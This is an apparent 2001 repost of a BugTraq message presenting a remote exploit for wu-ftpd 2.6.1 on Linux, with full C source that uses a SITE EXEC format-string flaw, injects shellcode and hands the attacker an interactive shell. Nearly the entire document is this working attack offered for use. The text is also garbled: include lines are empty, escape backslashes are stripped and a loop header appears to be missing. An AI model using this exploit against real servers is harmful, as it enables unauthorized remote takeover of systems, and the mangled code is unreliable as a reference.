wu-ftpd 2.6.1(1) on linux Exploit

posted onMarch 8, 2001

by hitbsecnews

Posted to BugTraq:

"hi,

this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me

bringin' you the 0day from the hackweiser crew, australian
+chapter

cya,
Till"

The full text follows in the read more link...
Note: Be advised that no code review has been made, compile and execute at your own risk!

----

/*
* Linux wu-ftpd - 2.6.1(1)
*
* DiGiT
*/

#include
#include
#include
#include
#include

char linuxcode[] =
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb"
"x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31"
"xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31"
"xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d"
"x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46"
"x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8"
"x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c"
"x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
"x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff"
"x30x62x69x6ex30x73x68x31x2ex2ex31x31";

main (int argc, char *argv[])
{

char cmdbuf[8192];
char cbuf[1024];
char *t;
char nop[400];
int pip, i, a = 22, st = 0;
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port = 21;
fd_set fds;
unsigned int aa;
long reta, retb, tmp, retz;
int ret;
int add = 0;

memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
memset (nop, 0x0, sizeof (nop));

if (argc < 2)
{
fprintf (stderr, "Usage: %s [ip]
", argv[0]);
exit (-1);
}

pip = socket (PF_INET, SOCK_STREAM, 0);

if (!pip)
{
perror ("socket()");
exit (-1);
}

inet = inet_addr (argv[1]);
if (inet == -1)
{
if (hp = gethostbyname (argv[1]))
memcpy (&inet, hp->h_addr, 4);
else
inet = -1;
if (inet == -1)
{
fprintf (stderr, "Cant resolv %s!!
", argv[1]);
exit (-1);
}
}
sck.sin_family = PF_INET;
sck.sin_port = htons (port);
sck.sin_addr.s_addr = inet;

if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
{
perror ("Connect() ");
exit (-1);
}

read (pip, cbuf, 1023);
fprintf (stderr, "Connected to: %s
", argv[1]);
fprintf (stderr, "Banner: %s
", cbuf);
strcpy (cmdbuf, "user ftp
");
write (pip, cmdbuf, strlen (cmdbuf));
memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);

strcat (nop, linuxcode);

memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "pass %s
", nop);
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
if (!strncmp (cmdbuf, "530", 3))
{
printf ("loggin incorrect : %s
", cmdbuf);
exit (-1);
}
fprintf (stderr, "Logged in..
");
fprintf (stderr, "+ Finding ret addresses
");
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
if (!strncmp (cmdbuf + 4, "%x", 2))
{
fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s
[0m",
cmdbuf);
exit (-1);
}
else
{
fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s
[0m",
cmdbuf);
}
reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);

memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret <= 88; ret++)
{
strcat (cmdbuf, "%x");
}
strcat (cmdbuf, "|%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
printf ("Ret location befor: %x
", reta);
if (reta == 0)
reta = retz;
else
add = 600;
reta = reta - 0x58;
retb = retb + 100 - 0x2569 - add;
printf ("Ret location : %x
", reta);
printf ("Proctitle addres : %x and %u
", retb, retb);
sleep (2);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

memset (cmdbuf, 0x0, sizeof (cmdbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
sprintf (cbuf, "|%%x|%%x
", aa + 9807 - 460);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
t = (char *) strstr (cmdbuf, "|");
tmp = strtoul (t + 1, t + 11, 16);
if (tmp != 0)
{
fprintf (stderr, "tmp 1 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 1;
break;
}
tmp = strtoul (t + 11, t + 22, 16);
fprintf (stderr, "tmp 2 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 2;
break;
}
}
if (st > 0)
break;
a++;
}
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
if (add != 600)
a = a - 1;
fprintf (stderr, "Trying with : %d
", a);
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");

aa = retb;
if (add == 600)
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807);
else
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807 - 480);

strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

fprintf (stderr, "[1m[33m Wait for a shell.....
[0m");

while (1)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (pip, &fds);
select (255, &fds, NULL, NULL, NULL);
if (FD_ISSET (pip, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
ret = read (pip, cbuf, sizeof (cbuf) - 1);
if (ret <= 0)
{
printf ("Connection closed - EOF
");
exit (-1);
}
printf ("%s", cbuf);
}
if (FD_ISSET (0, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
read (0, cbuf, sizeof (cbuf) - 1);
write (pip, cbuf, strlen (cbuf));
}
}
close (pip);
}